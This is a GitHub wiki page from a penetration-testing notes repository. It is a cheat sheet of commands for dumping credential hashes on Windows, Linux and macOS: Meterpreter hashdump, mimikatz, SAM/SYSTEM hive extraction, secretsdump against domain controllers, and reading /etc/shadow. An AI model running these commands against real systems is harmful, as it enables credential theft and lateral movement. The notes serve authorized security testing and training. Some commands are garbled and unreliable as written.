forked from tjnull/TJ-JPT
-
Notifications
You must be signed in to change notification settings - Fork 7
Dumping Hashes
TheGetch edited this page May 14, 2021
·
2 revisions
Dumping Hashes
- run post/windows/gather/hashdump
- load mimikatz
- creds_all
DUMP LSA SECRETS
- lsadump.py sys_backup.hiv sec_backup.hiv
DUMP LOCAL PASSWORD HASHES
- pwdump.py sys_backup.hiv sec_backup.hiv
reg save HKLM\sam sam
reg save HKLM\system system
samdump2 SYSTEM SAM > hashes.db
Scretsdump.py script does require a pwned user account on the target machine.
$ sudo python3 secretsdump.py domain.local\username:password@<target_IP>
or
secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes
If you have the NTDS.dit file and the SYSTEM hive:
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
Requires Root Privileges
-
cat /etc/shadow -
cp /etc/passwdand/etc/shadow -
unshadow passwd shadow > unshadowed
10.5-10.7
- dscl localhost -read /Search/Users/|grep GeneratedUID|cut -c15-cat /var/db/shadow/hash/ | cut -c169-216 > osx_hash.txt
10.8-10.12
- sudo defaults read /var/db/dslocal/nodes/Default/users/.plist ShadowHashData|tr -dc ‘ 0-9a-f’|xxd -p -r|plutil -convert xml1 - -o -
_Sidebar
1. Recon
- Ping Sweep: Windows Method
- Ping Sweep: Bash Method
- NetDiscover (ARP Scanning
- Nbtscan
- Ping Sweep: Python Method
- Ping Sweep: PowerShell Method
- Ping Sweep: Nmap method
- HTTP General Notes
- Cross-Site Scripting (XSS)
- SQL Injection (SQLi)
- Deserialization
- Directory Fuzzing
- IDOR Testing
- Intigriti Bug Bounty Tips
- Out of band exploitation
- Server-Side Template Injection (SSTI) Help
- Subdomain Enumeration
- WebFOCUS
- XXE Cheatsheet
- C2 Frameworks
- BloodHound
- Powershell Empire Quick Start Cheatsheet
- Pivoting/Tunneling
- Impacket
- Rubeus
- Mimikatz
- Identifying Hash Types
-
Dumping Hashes
-
- Cracking Hashes Offline
-
- Cracking Hashes Online
-
- Metasploit Meterpreter Migrate Process
- VMWare Port Forwarding
- Veil Simple Usage
- SSH: Generate OpenSSL RSA Key Pair from the Command Line
- Skipfish
- sed & awk: set root password in etc/shadow
- Search for ssh key quickly
- Python Proxy to Burp
- Python Convert .py to .exe
- PuttySCP Commands
- Powershell tidbits
- Password List - Generate quick list
- OS Enumeration - Ping
- Kerberos: Get KDC name and DNS name
- Impacket Scripts Error
- Gcc Compile Windows Executable in Linux
- Find Command: Filter out permission denied errors
- Excel Injection
- Digitally Sign Files (PowerShell Example)
- CSRF Tokens as Cookie Note
- Clear bash
- Burp Intruder Match/Replace
- Apache headers Test
- Windows Trial VMs
- Subdomain Brute Force
- Spawning TTY Shell
- Reserve Shell Cheat Sheet
- Pass-the-Hash
- Common Meterpreter Commands
- gcc & wine
- File Transfers
- Enable RDP - Windows
- DNS Reverse Lookup Brute Force
- Adding Users